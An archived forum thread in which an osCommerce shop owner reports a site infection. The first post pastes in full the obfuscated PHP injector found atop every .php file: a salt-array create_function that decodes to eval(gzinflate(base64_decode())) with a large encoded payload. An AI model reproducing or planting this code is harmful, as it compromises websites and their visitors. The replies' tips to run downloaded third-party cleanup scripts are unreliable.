spitlikethis Posted September 10, 2011 Share Posted September 10, 2011 Hello So, a few days ago I edited one of my item's descriptions and noticed the following had been added to EVERY item: <style>#okgd {position:absolute;overflow:auto;height:0;width:0;}</style> followed by a long list of links to sites in places like Russia. I have implemented several of the suggested security changes on the forums and I am guessing one of these has fixed that problem as I can no longer see it! (I should point out that it didn't seem to affect how my site ran). However, when I made the security changes, I noticed that every single one of my .php scripts had something similar to this <?php $md5 = "71f4d60cd528c299cdba7d684da9ed0c"; $wp_salt = array('f','_','e',";","6",'o',"r","d",'g','a',"i",'s',"b","l",'$',')','(',"c","n","t","v",'4','z'); $wp_add_filter = create_function('$'.'v',$wp_salt[2].$wp_salt[20].$wp_salt[9].$wp_salt[13].$wp_salt[16].$wp_salt[8].$wp_salt[22].$wp_salt[10].$wp_salt[18].$wp_salt[0].$wp_salt[13].$wp_salt[9].$wp_salt[19].$wp_salt[2].$wp_salt[16].$wp_salt[12].$wp_salt[9].$wp_salt[11].$wp_salt[2].$wp_salt[4].$wp_salt[21].$wp_salt[1].$wp_salt[7].$wp_salt[2].$wp_salt[17].$wp_salt[5].$wp_salt[7].$wp_salt[2].$wp_salt[16].$wp_salt[14].$wp_salt[20].$wp_salt[15].$wp_salt[15].$wp_salt[15].$wp_salt[3]); $wp_add_filter('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'); ?> at the top. My question is really this - do I need to now remove this script from all the .php files (as I have beefed up security)? They aren't pretty but, if they can't be "activated" now, I'd rather not have to! If I DO have to, are there any handy tools to do this? I have Googled the problem and see that something similar occurs with Wordpress users and some helpful person has written a script to remove them - on Wordpress. Thanks in advance. Z Link to comment Share on other sites More sharing options...
spitlikethis Posted September 10, 2011 Author Share Posted September 10, 2011 OK, I'm going to answer my own question here! I decided to try the script which is here http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html - I downloaded it, uploaded it to the root and then ran it. I have several sites running on one server and it went through them all - it was only the Oscommerce site infected but it removed all the malicious scripts and now my site is running super fast. Please note, I am NOT a programmer or anything so I hope I have done the right thing. I have tried test orders etc and it all seems to be running as it should but use it at your own discretion. Of course, if I encounter any probs, I will post them up here. Z Link to comment Share on other sites More sharing options...
germ Posted September 10, 2011 Share Posted September 10, 2011 I suppose the $64 question would be is the Wordpress part of the site secure? Judging from what you've posted I say it was the avenue of attack on the osC part of the site. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
spitlikethis Posted September 11, 2011 Author Share Posted September 11, 2011 Couldn't say for certain, Germ, they are on different parts of the server and my Wordpress sites are clear. Personally, I think it was via osC, but I have patched the holes up now so hope it will be OK! Link to comment Share on other sites More sharing options...
drrest Posted September 21, 2011 Share Posted September 21, 2011 Yes/ This is virus. He cloning self to all files on hosting with PHP extensions. AntiVirus script without registrations you can get here: http://beznervov.com/computers/programmy/viruses/virus_php_all_files/ (sorry for russian, but thats work is perfectly) Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.